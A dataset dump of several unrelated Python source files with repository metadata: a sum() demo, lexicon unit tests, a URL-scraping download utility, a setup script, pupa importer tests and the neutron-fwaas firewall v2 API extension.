| 38.725664 | 114 | 0.63654 | 1,077 | 8,752 | 4.91922 | 0.241411 | 0.020385 | 0.018875 | 0.018498 | 0.375047 | 0.297282 | 0.265761 | 0.196112 | 0.118724 | 0.118724 | 0 | 0.00907 | 0.256741 | 8,752 | 225 | 115 | 38.897778 | 0.80538 | 0.110946 | 0 | 0.283237 | 1 | 0 | 0.101827 | 0.006348 | 0 | 0 | 0 | 0 | 0.115607 | 1 | 0.075145 | false | 0 | 0.098266 | 0.00578 | 0.184971 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1bf2d4c209e500db17a5c6d33e7442b5b858b75b | 343 | py | Python | sum.py | PraghadeshManivannan/Built-in-Functions-Python | a3120641e03e7be8e1408dd467997ad6fdf04d87 | [
"MIT"
] | null | null | null | sum.py | PraghadeshManivannan/Built-in-Functions-Python | a3120641e03e7be8e1408dd467997ad6fdf04d87 | [
"MIT"
] | null | null | null | sum.py | PraghadeshManivannan/Built-in-Functions-Python | a3120641e03e7be8e1408dd467997ad6fdf04d87 | [
"MIT"
] | null | null | null |
#sum(iterable, start=0, /)
#Return the sum of a 'start' value (default: 0) plus an iterable of numbers
#When the iterable is empty, return the start value.
'''This function is intended specifically for use with numeric values and may
reject non-numeric types.'''
a = [1,3,5,7,9,4,6,2,8]
print(sum(a))
print(sum(a,start = 4))
| 24.5 | 78 | 0.676385 | 61 | 343 | 3.803279 | 0.655738 | 0.077586 | 0.077586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043321 | 0.19242 | 343 | 13 | 79 | 26.384615 | 0.794224 | 0.731778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
1bf74b762d2902af1c8ee402ce83c52345c29025 | 5,266 | py | Python | tests/commonsense/semantic_lexicon_knowledge/ai2_lexicon_test.py | keisks/propara | 49fa8fe0481291df18b2c7b48e7ba1dafaad48e2 | [
"Apache-2.0"
] | 84 | 2018-06-02T02:00:53.000Z | 2022-03-13T12:17:42.000Z | tests/commonsense/semantic_lexicon_knowledge/ai2_lexicon_test.py | keisks/propara | 49fa8fe0481291df18b2c7b48e7ba1dafaad48e2 | [
"Apache-2.0"
] | 3 | 2018-10-31T00:28:31.000Z | 2020-05-12T01:06:53.000Z | tests/commonsense/semantic_lexicon_knowledge/ai2_lexicon_test.py | keisks/propara | 49fa8fe0481291df18b2c7b48e7ba1dafaad48e2 | [
"Apache-2.0"
] | 13 | 2018-09-14T20:37:51.000Z | 2021-03-23T09:24:49.000Z | from unittest import TestCase
from propara.commonsense.semantic_lexicon_knowledge.ai2_lexicon import AI2Lexicon, AI2LexiconPredicate, AI2LexiconArg, AI2LexiconIndications, \
AI2LexiconPattern
class TestAI2Lexicon(TestCase):
def setUp(self):
self.lexicon_fp = "tests/fixtures/ie/TheSemanticLexicon-v3.0_withadj.tsv"
def testLoads(self):
self.lexicon = AI2Lexicon(self.lexicon_fp)
# print(f"evaporate.subj: {self.lexicon.what_happens_to_subj('evaporate', has_agent=True, has_patient=False)}")
# print(f"evaporate.obj: {self.lexicon.what_happens_to_obj('evaporate', has_agent=True, has_patient=False)}")
#
# print(f"evaporate.subj: {self.lexicon.what_happens_to_subj('evaporate')}")
# print(f"evaporate.obj: {self.lexicon.what_happens_to_obj('evaporate')}")
# v2 doesn't contain size, temperature, phase attributes
# infile = "tests/fixtures/ie/ai2-lexicon-v2.tsv"
# the following path is useful when debugging from browser.
# self.lexicon = AI2Lexicon("tests/fixtures/ie/TheSemanticLexicon-v3.0_withadj.tsv")
assert self.lexicon._after_subj(("blend in", AI2LexiconPattern.SO)) == {
AI2LexiconPredicate.IS_AT: AI2LexiconArg.OBJECT,
AI2LexiconPredicate.NOT_IS_AT: AI2LexiconArg.PREP_SRC,
}
assert self.lexicon._after_obj(("absorb", AI2LexiconPattern.SO))[
AI2LexiconPredicate.IS_AT] == AI2LexiconArg.SUBJECT
# assert self.lexicon._after_obj(("absorbs", AI2LexiconPattern.SO)).get(AI2LexiconPredicate.IS_AT, "") == AI2LexiconArg.SUBJECT
assert len(self.lexicon._after_obj(("blend in", AI2LexiconPattern.SO))) == 0
assert len(self.lexicon._after_obj(("blend blend2", AI2LexiconPattern.SO))) == 0
assert AI2LexiconIndications.MOVED not in self.lexicon.what_happens_to_subj("absorbs")
assert AI2LexiconIndications.MOVED in self.lexicon.what_happens_to_obj("absorbs")
assert AI2LexiconIndications.CREATED in self.lexicon.what_happens_to_obj("sprout")
assert AI2LexiconIndications.CREATED in self.lexicon.what_happens_to_subj("sprout", has_agent=True,
has_patient=False)
assert AI2LexiconIndications.DESTROYED not in self.lexicon.what_happens_to_subj("sprout")
assert AI2LexiconIndications.DESTROYED not in self.lexicon.what_happens_to_obj("sprout")
assert AI2LexiconIndications.TEMPERATURE_INC not in self.lexicon.what_happens_to_obj("turn")
assert AI2LexiconIndications.TEMPERATURE_INC in self.lexicon.what_happens_to_subj("gets hot")
assert AI2LexiconIndications.SIZE_INC in self.lexicon.what_happens_to_subj("gets bigger")
assert AI2LexiconIndications.SIZE_INC in self.lexicon.what_happens_to_subj("become bigger")
assert AI2LexiconIndications.SIZE_INC in self.lexicon.what_happens_to_subj("turned bigger")
assert AI2LexiconIndications.SIZE_INC not in self.lexicon.what_happens_to_obj("turns into bigger")
assert AI2LexiconIndications.MOVED not in self.lexicon.what_happens_to_subj("turned")
assert AI2LexiconIndications.PHASE_UNK_GAS in self.lexicon.what_happens_to_subj("turned gaseous")
assert AI2LexiconIndications.PHASE_LIQUID_SOLID in self.lexicon.what_happens_to_subj("solidify", has_agent=True,
has_patient=False)
assert AI2LexiconIndications.PHASE_LIQUID_SOLID in self.lexicon.what_happens_to_obj("solidify", has_agent=True,
has_patient=True)
assert AI2LexiconIndications.PHASE_UNK_SOLID not in self.lexicon.what_happens_to_subj("solidifies")
assert AI2LexiconIndications.PHASE_SOLID_GAS in self.lexicon.what_happens_to_subj("sublime", has_agent=True,
has_patient=False)
assert AI2LexiconIndications.PHASE_SOLID_GAS in self.lexicon.what_happens_to_obj("sublime", has_agent=True,
has_patient=True)
# if agent and patient both are present or only 1
# the difference is whether object is given or not
# this happens for all verbs that can be both transitive/intransitive
# they will have 2 entries.
#
# A big rock stops the stream of water from uphill => stream of water moved from uphill to rock
# car stops at the intersection ==> car moved to intersection
# we have removed lots of fine details in the patterns (VerbNet had much more info there)
# if agent and patient both are present or only 1
def test_type_of_pattern(self):
input = "SUBJECT VERB OBJECT PREP-SRC PREP-DEST"
assert AI2Lexicon.type_of_pattern(input) == AI2LexiconPattern.SO
input = "SUBJECT VERB OBJECT"
assert AI2Lexicon.type_of_pattern(input) == AI2LexiconPattern.SO
input = "SUBJECT VERB PREP-SRC PREP-DEST"
assert AI2Lexicon.type_of_pattern(input) == AI2LexiconPattern.S
| 71.162162 | 143 | 0.681732 | 614 | 5,266 | 5.630293 | 0.245928 | 0.101822 | 0.099798 | 0.14637 | 0.663581 | 0.64015 | 0.568412 | 0.538039 | 0.472375 | 0.405265 | 0 | 0.014955 | 0.238131 | 5,266 | 73 | 144 | 72.136986 | 0.84671 | 0.230915 | 0 | 0.148936 | 0 | 0 | 0.084119 | 0.013151 | 0 | 0 | 0 | 0 | 0.553191 | 1 | 0.06383 | false | 0 | 0.042553 | 0 | 0.12766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4007ccb371063c993bd22bb2370d18838e357a3f | 3,218 | py | Python | extractor/util.py | bcskda/vk-archive-deepercopy | 3619b94eb3e0f5f67860022cdfb2074e457c0cd2 | [
"Unlicense"
] | 1 | 2020-04-24T09:24:31.000Z | 2020-04-24T09:24:31.000Z | extractor/util.py | bcskda/vk-archive-deepercopy | 3619b94eb3e0f5f67860022cdfb2074e457c0cd2 | [
"Unlicense"
] | null | null | null | extractor/util.py | bcskda/vk-archive-deepercopy | 3619b94eb3e0f5f67860022cdfb2074e457c0cd2 | [
"Unlicense"
] | null | null | null | import functools
import glob
import itertools
import logging
import os
from progressbar import progressbar
import re
import requests
from typing import List
class ValueSingleDispatch:
def __init__(self):
self._handlers = dict()
def register(self, key):
def decorator(fn: callable):
if key in self._handlers:
raise KeyError(key)
self._handlers[key] = fn
return fn
return decorator
def call(self, key, *args, **kwargs):
if key not in self._handlers:
raise KeyError(key)
return self._handlers[key](*args, **kwargs)
def valid_keys(self):
return self._handlers.keys()
def alphanumeric_glob(pattern: str):
"""Glob and sort alpahnumerically. Limitations: exactly one `*', no `?', file names with single extention."""
matches = glob.glob(pattern)
asterisk_pos = pattern.find('*')
matches.sort(key=lambda name: int(name[asterisk_pos:name.rfind('.')]))
return matches
def findall_in_files(pattern: re.Pattern, filenames: List[str], encoding: str) -> re.Match:
"""Generator"""
for filename in filenames:
logging.debug('util.findall_in_files: input file %s', filename)
with open(filename, 'rb') as ifile:
for match in pattern.findall(ifile.read().decode(encoding)):
logging.debug('util.findall_in_files(): match: file = %s, text = %s', filename, match)
yield match
def make_pattern(url_regex: str, extentions: List[str]) -> re.Pattern:
if extentions:
ext_regex = '({})'.format('|'.join(extentions))
else:
ext_regex = '()'
return re.compile(url_regex.format(extentions=ext_regex))
def download_by_pattern(url_regex: str, filenames: List[str], output_dir: str, *, extentions=[], encoding='windows-1251', limit=None):
logging.debug('util.download_by_pattern(): pattern = %s, extentions = %s', url_regex, extentions)
pattern = make_pattern(url_regex, extentions)
matches = findall_in_files(pattern, filenames, encoding)
if limit is not None:
matches = itertools.islice(matches, limit)
matches = list(matches)
logging.info('util.download_by_pattern(): %d matches', len(matches))
os.makedirs(output_dir, exist_ok=True)
downloads = 0
# TODO statistics by extention
for idx, (url, ext) in progressbar(enumerate(matches), max_value=len(matches)):
local_name = '{:07d}'.format(idx) + '_' + os.path.basename(url)
try:
download(url, os.path.join(output_dir, local_name))
downloads += 1
except Exception as e:
logging.warning('util.download_by_pattern(): unhandled exception: url = %s, e = %s', match_url, e)
logging.info('util.download_by_pattern(): %d successful downloads', downloads)
if downloads < len(matches):
logging.warning('util.download_by_pattern(): %d downloads failed, see log for warnings', len(matches) - downloads)
def download(url: str, local_path: str) -> bool:
logging.debug('util.download(): url = %s, local = %s', url, local_path)
req = requests.get(url)
with open(local_path, 'wb') as ofile:
ofile.write(req.content)
| 38.771084 | 134 | 0.657551 | 408 | 3,218 | 5.04902 | 0.330882 | 0.034951 | 0.049515 | 0.050971 | 0.124757 | 0.124272 | 0.032039 | 0 | 0 | 0 | 0 | 0.003168 | 0.215351 | 3,218 | 82 | 135 | 39.243902 | 0.812673 | 0.044438 | 0 | 0.029412 | 0 | 0 | 0.142624 | 0.059073 | 0 | 0 | 0 | 0.012195 | 0 | 1 | 0.147059 | false | 0 | 0.132353 | 0.014706 | 0.382353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
400afc4da001a8c030925a65e03f44b9ed050772 | 1,637 | py | Python | setup.py | gillins/pyshepseg | bfa8d157d610bf4f581a2500d0afb42d4f92d59b | [
"MIT"
] | 5 | 2021-02-03T05:02:56.000Z | 2022-01-31T07:55:20.000Z | setup.py | gillins/pyshepseg | bfa8d157d610bf4f581a2500d0afb42d4f92d59b | [
"MIT"
] | 14 | 2021-02-03T04:18:48.000Z | 2022-01-24T03:50:22.000Z | setup.py | gillins/pyshepseg | bfa8d157d610bf4f581a2500d0afb42d4f92d59b | [
"MIT"
] | 13 | 2021-02-03T03:41:17.000Z | 2022-01-24T04:21:23.000Z | #Copyright 2021 Neil Flood and Sam Gillingham. All rights reserved.
#
#Permission is hereby granted, free of charge, to any person
#obtaining a copy of this software and associated documentation
#files (the "Software"), to deal in the Software without restriction,
#including without limitation the rights to use, copy, modify,
#merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
#OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR
#ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
#CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
#WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from numpy.distutils.core import setup
import pyshepseg
setup(name='pyshepseg',
version=pyshepseg.SHEPSEG_VERSION,
description='Python implementation of the image segmentation algorithm described by Shepherd et al',
author='Neil Flood and Sam Gillingham',
scripts=['bin/test_pyshepseg.py', 'bin/test_pyshepseg_tiling.py',
'bin/test_pyshepseg_subset.py'],
packages=['pyshepseg'],
license='LICENSE.txt',
url='https://github.com/ubarsc/pyshepseg'
)
| 46.771429 | 106 | 0.756261 | 233 | 1,637 | 5.287554 | 0.566524 | 0.071429 | 0.038961 | 0.024351 | 0.040584 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002963 | 0.175321 | 1,637 | 34 | 107 | 48.147059 | 0.90963 | 0.662187 | 0 | 0 | 0 | 0 | 0.478424 | 0.144465 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
401988f94a7b7ebda02b1f821bbce411385f8136 | 3,885 | py | Python | pupa/tests/importers/test_base_importer.py | influence-usa/pupa | 5105c39a535ad401f7babe4eecb3861bed1f8326 | [
"BSD-3-Clause"
] | null | null | null | pupa/tests/importers/test_base_importer.py | influence-usa/pupa | 5105c39a535ad401f7babe4eecb3861bed1f8326 | [
"BSD-3-Clause"
] | 3 | 2015-06-09T19:22:50.000Z | 2015-06-09T21:41:22.000Z | pupa/tests/importers/test_base_importer.py | influence-usa/pupa | 5105c39a535ad401f7babe4eecb3861bed1f8326 | [
"BSD-3-Clause"
] | null | null | null | import os
import json
import shutil
import tempfile
import mock
import pytest
from opencivicdata.models import Person
from pupa.scrape import Person as ScrapePerson
from pupa.scrape import Organization as ScrapeOrganization
from pupa.importers.base import omnihash, BaseImporter
from pupa.importers import PersonImporter, OrganizationImporter
from pupa.exceptions import UnresolvedIdError, DataImportError
class FakeImporter(BaseImporter):
_type = 'test'
def test_omnihash_python_types():
# string
assert omnihash('test') == omnihash('test')
# list
assert omnihash(['this', 'is', 'a', 'list']) == omnihash(['this', 'is', 'a', 'list'])
# set
assert omnihash({'and', 'a', 'set'}) == omnihash({'set', 'set', 'and', 'a'})
# dict w/ set and tuple as well
assert (omnihash({'a': {('fancy', 'nested'): {'dict'}}}) ==
omnihash({'a': {('fancy', 'nested'): {'dict'}}}))
def test_import_directory():
# write out some temp data to filesystem
datadir = tempfile.mkdtemp()
dicta = {'test': 'A'}
dictb = {'test': 'B'}
open(os.path.join(datadir, 'test_a.json'), 'w').write(json.dumps(dicta))
open(os.path.join(datadir, 'test_b.json'), 'w').write(json.dumps(dictb))
# simply ensure that import directory calls import_data with all dicts
ti = FakeImporter('jurisdiction-id')
with mock.patch.object(ti, attribute='import_data') as mockobj:
ti.import_directory(datadir)
# import_data should be called once
assert mockobj.call_count == 1
# kind of hacky, get the total list of args passed in
arg_objs = list(mockobj.call_args[0][0])
# 2 args only, make sure a and b are in there
assert len(arg_objs) == 2
assert dicta in arg_objs
assert dictb in arg_objs
# clean up datadir
shutil.rmtree(datadir)
# doing these next few tests just on a Person because it is the same code that handles it
# but for completeness maybe it is better to do these on each type?
@pytest.mark.django_db
def test_deduplication_identical_object():
p1 = ScrapePerson('Dwayne').as_dict()
p2 = ScrapePerson('Dwayne').as_dict()
PersonImporter('jid').import_data([p1, p2])
assert Person.objects.count() == 1
@pytest.mark.django_db
def test_exception_on_identical_objects_in_import_stream():
# these two objects aren't identical, but refer to the same thing
# at the moment we consider this an error (but there may be a better way to handle this?)
o1 = ScrapeOrganization('X-Men', classification='unknown').as_dict()
o2 = ScrapeOrganization('X-Men', founding_date='1970', classification='unknown').as_dict()
with pytest.raises(Exception):
OrganizationImporter('jid').import_data([o1, o2])
@pytest.mark.django_db
def test_resolve_json_id():
p1 = ScrapePerson('Dwayne').as_dict()
p2 = ScrapePerson('Dwayne').as_dict()
pi = PersonImporter('jid')
# do import and get database id
p1_id = p1['_id']
p2_id = p2['_id']
pi.import_data([p1, p2])
db_id = Person.objects.get().id
# simplest case
assert pi.resolve_json_id(p1_id) == db_id
# duplicate should resolve to same id
assert pi.resolve_json_id(p2_id) == db_id
# a null id should map to None
assert pi.resolve_json_id(None) is None
# no such id
with pytest.raises(UnresolvedIdError):
pi.resolve_json_id('this-is-invalid')
@pytest.mark.django_db
def test_invalid_fields():
p1 = ScrapePerson('Dwayne').as_dict()
p1['newfield'] = "shouldn't happen"
with pytest.raises(DataImportError):
PersonImporter('jid').import_data([p1])
@pytest.mark.django_db
def test_invalid_fields_related_item():
p1 = ScrapePerson('Dwayne')
p1.add_link('http://example.com')
p1 = p1.as_dict()
p1['links'][0]['test'] = 3
with pytest.raises(DataImportError):
PersonImporter('jid').import_data([p1])
| 31.585366 | 94 | 0.686486 | 543 | 3,885 | 4.775322 | 0.344383 | 0.030852 | 0.030852 | 0.034709 | 0.257231 | 0.163903 | 0.115696 | 0.115696 | 0.086386 | 0.040108 | 0 | 0.012295 | 0.183526 | 3,885 | 122 | 95 | 31.844262 | 0.80517 | 0.186873 | 0 | 0.186667 | 0 | 0 | 0.09366 | 0 | 0 | 0 | 0 | 0 | 0.16 | 1 | 0.093333 | false | 0 | 0.346667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
401fd2803f10b2fab1010a7dfe0776cbe8cc8571 | 11,612 | py | Python | neutron_fwaas/extensions/firewall_v2.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/extensions/firewall_v2.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/extensions/firewall_v2.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from debtcollector import moves
from neutron.api.v2 import resource_helper
from neutron_lib.api.definitions import constants as api_const
from neutron_lib.api.definitions import firewall_v2
from neutron_lib.api import extensions
from neutron_lib.exceptions import firewall_v2 as f_exc
from neutron_lib.services import base as service_base
from oslo_config import cfg
import six
from neutron_fwaas._i18n import _
from neutron_fwaas.common import fwaas_constants
FirewallGroupNotFound = moves.moved_class(
f_exc.FirewallGroupNotFound, 'FirewallGroupNotFound', __name__)
FirewallGroupInUse = moves.moved_class(
f_exc.FirewallGroupInUse, 'FirewallGroupInUse', __name__)
FirewallGroupInPendingState = moves.moved_class(
f_exc.FirewallGroupInPendingState, 'FirewallGroupInPendingState', __name__)
FirewallGroupPortInvalid = moves.moved_class(
f_exc.FirewallGroupPortInvalid, 'FirewallGroupPortInvalid', __name__)
FirewallGroupPortInvalidProject = moves.moved_class(
f_exc.FirewallGroupPortInvalidProject, 'FirewallGroupPortInvalidProject',
__name__)
FirewallGroupPortInUse = moves.moved_class(
f_exc.FirewallGroupPortInUse, 'FirewallGroupPortInUse', __name__)
FirewallPolicyNotFound = moves.moved_class(
f_exc.FirewallPolicyNotFound, 'FirewallPolicyNotFound', __name__)
FirewallPolicyInUse = moves.moved_class(
f_exc.FirewallPolicyInUse, 'FirewallPolicyInUse', __name__)
FirewallPolicyConflict = moves.moved_class(
f_exc.FirewallPolicyConflict, 'FirewallPolicyConflict', __name__)
FirewallRuleSharingConflict = moves.moved_class(
f_exc.FirewallRuleSharingConflict, 'FirewallRuleSharingConflict',
__name__)
FirewallPolicySharingConflict = moves.moved_class(
f_exc.FirewallPolicySharingConflict, 'FirewallPolicySharingConflict',
__name__)
FirewallRuleNotFound = moves.moved_class(
f_exc.FirewallRuleNotFound, 'FirewallRuleNotFound', __name__)
FirewallRuleInUse = moves.moved_class(
f_exc.FirewallRuleInUse, 'FirewallRuleInUse', __name__)
FirewallRuleNotAssociatedWithPolicy = moves.moved_class(
f_exc.FirewallRuleNotAssociatedWithPolicy,
'FirewallRuleNotAssociatedWithPolicy',
__name__)
FirewallRuleInvalidProtocol = moves.moved_class(
f_exc.FirewallRuleInvalidProtocol, 'FirewallRuleInvalidProtocol',
__name__)
FirewallRuleInvalidAction = moves.moved_class(
f_exc.FirewallRuleInvalidAction, 'FirewallRuleInvalidAction',
__name__)
FirewallRuleInvalidICMPParameter = moves.moved_class(
f_exc.FirewallRuleInvalidICMPParameter,
'FirewallRuleInvalidICMPParameter', __name__)
FirewallRuleWithPortWithoutProtocolInvalid = moves.moved_class(
f_exc.FirewallRuleWithPortWithoutProtocolInvalid,
'FirewallRuleWithPortWithoutProtocolInvalid', __name__)
FirewallRuleInvalidPortValue = moves.moved_class(
f_exc.FirewallRuleInvalidPortValue, 'FirewallRuleInvalidPortValue',
__name__)
FirewallRuleInfoMissing = moves.moved_class(
f_exc.FirewallRuleInfoMissing, 'FirewallRuleInfoMissing', __name__)
FirewallIpAddressConflict = moves.moved_class(
f_exc.FirewallIpAddressConflict, 'FirewallIpAddressConflict', __name__)
FirewallInternalDriverError = moves.moved_class(
f_exc.FirewallInternalDriverError, 'FirewallInternalDriverError', __name__)
FirewallRuleConflict = moves.moved_class(
f_exc.FirewallRuleConflict, 'FirewallRuleConflict', __name__)
FirewallRuleAlreadyAssociated = moves.moved_class(
f_exc.FirewallRuleAlreadyAssociated, 'FirewallRuleAlreadyAssociated',
__name__)
default_fwg_rules_opts = [
cfg.StrOpt('ingress_action',
default=api_const.FWAAS_DENY,
help=_('Firewall group rule action allow or '
'deny or reject for ingress. '
'Default is deny.')),
cfg.StrOpt('ingress_source_ipv4_address',
default=None,
help=_('IPv4 source address for ingress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('ingress_source_ipv6_address',
default=None,
help=_('IPv6 source address for ingress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('ingress_source_port',
default=None,
help=_('Source port number or range '
'(min:max) for ingress. '
'Default is None.')),
cfg.StrOpt('ingress_destination_ipv4_address',
default=None,
help=_('IPv4 destination address for ingress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('ingress_destination_ipv6_address',
default=None,
help=_('IPv6 destination address for ingress '
'(address or address/netmask). '
'Default is deny.')),
cfg.StrOpt('ingress_destination_port',
default=None,
help=_('Destination port number or range '
'(min:max) for ingress. '
'Default is None.')),
cfg.StrOpt('egress_action',
default=api_const.FWAAS_ALLOW,
help=_('Firewall group rule action allow or '
'deny or reject for egress. '
'Default is allow.')),
cfg.StrOpt('egress_source_ipv4_address',
default=None,
help=_('IPv4 source address for egress '
'(address or address/netmask). '
'Default is None.')),
cfg.StrOpt('egress_source_ipv6_address',
default=None,
help=_('IPv6 source address for egress '
'(address or address/netmask). '
'Default is deny.')),
cfg.StrOpt('egress_source_port',
default=None,
help=_('Source port number or range '
'(min:max) for egress. '
'Default is None.')),
cfg.StrOpt('egress_destination_ipv4_address',
default=None,
help=_('IPv4 destination address for egress '
'(address or address/netmask). '
'Default is deny.')),
cfg.StrOpt('egress_destination_ipv6_address',
default=None,
help=_('IPv6 destination address for egress '
'(address or address/netmask). '
'Default is deny.')),
cfg.StrOpt('egress_destination_port',
default=None,
help=_('Destination port number or range '
'(min:max) for egress. '
'Default is None.')),
cfg.BoolOpt('shared',
default=False,
help=_('Firewall group rule shared. '
'Default is False.')),
cfg.StrOpt('protocol',
default=None,
help=_('Network protocols (tcp, udp, ...). '
'Default is None.')),
cfg.BoolOpt('enabled',
default=True,
help=_('Firewall group rule enabled. '
'Default is True.')),
]
firewall_quota_opts = [
cfg.IntOpt('quota_firewall_group',
default=10,
help=_('Number of firewall groups allowed per tenant. '
'A negative value means unlimited.')),
cfg.IntOpt('quota_firewall_policy',
default=10,
help=_('Number of firewall policies allowed per tenant. '
'A negative value means unlimited.')),
cfg.IntOpt('quota_firewall_rule',
default=100,
help=_('Number of firewall rules allowed per tenant. '
'A negative value means unlimited.')),
]
cfg.CONF.register_opts(default_fwg_rules_opts, 'default_fwg_rules')
cfg.CONF.register_opts(firewall_quota_opts, 'QUOTAS')
# TODO(Reedip): Remove the convert_to functionality after bug1706061 is fixed.
def convert_to_string(value):
if value is not None:
return str(value)
return None
firewall_v2.RESOURCE_ATTRIBUTE_MAP[api_const.FIREWALL_RULES][
'source_port']['convert_to'] = convert_to_string
firewall_v2.RESOURCE_ATTRIBUTE_MAP[api_const.FIREWALL_RULES][
'destination_port']['convert_to'] = convert_to_string
class Firewall_v2(extensions.APIExtensionDescriptor):
api_definition = firewall_v2
@classmethod
def get_resources(cls):
special_mappings = {'firewall_policies': 'firewall_policy'}
plural_mappings = resource_helper.build_plural_mappings(
special_mappings, firewall_v2.RESOURCE_ATTRIBUTE_MAP)
return resource_helper.build_resource_info(
plural_mappings, firewall_v2.RESOURCE_ATTRIBUTE_MAP,
fwaas_constants.FIREWALL_V2, action_map=firewall_v2.ACTION_MAP,
register_quota=True)
@classmethod
def get_plugin_interface(cls):
return Firewallv2PluginBase
@six.add_metaclass(abc.ABCMeta)
class Firewallv2PluginBase(service_base.ServicePluginBase):
def get_plugin_type(self):
return fwaas_constants.FIREWALL_V2
def get_plugin_description(self):
return 'Firewall Service v2 Plugin'
# Firewall Group
@abc.abstractmethod
def create_firewall_group(self, context, firewall_group):
pass
@abc.abstractmethod
def delete_firewall_group(self, context, id):
pass
@abc.abstractmethod
def get_firewall_group(self, context, id, fields=None):
pass
@abc.abstractmethod
def get_firewall_groups(self, context, filters=None, fields=None):
pass
@abc.abstractmethod
def update_firewall_group(self, context, id, firewall_group):
pass
# Firewall Policy
@abc.abstractmethod
def create_firewall_policy(self, context, firewall_policy):
pass
@abc.abstractmethod
def delete_firewall_policy(self, context, id):
pass
@abc.abstractmethod
def get_firewall_policy(self, context, id, fields=None):
pass
@abc.abstractmethod
def get_firewall_policies(self, context, filters=None, fields=None):
pass
@abc.abstractmethod
def update_firewall_policy(self, context, id, firewall_policy):
pass
# Firewall Rule
@abc.abstractmethod
def create_firewall_rule(self, context, firewall_rule):
pass
@abc.abstractmethod
def delete_firewall_rule(self, context, id):
pass
@abc.abstractmethod
def get_firewall_rule(self, context, id, fields=None):
pass
@abc.abstractmethod
def get_firewall_rules(self, context, filters=None, fields=None):
pass
@abc.abstractmethod
def update_firewall_rule(self, context, id, firewall_rule):
pass
@abc.abstractmethod
def insert_rule(self, context, id, rule_info):
pass
@abc.abstractmethod
def remove_rule(self, context, id, rule_info):
pass
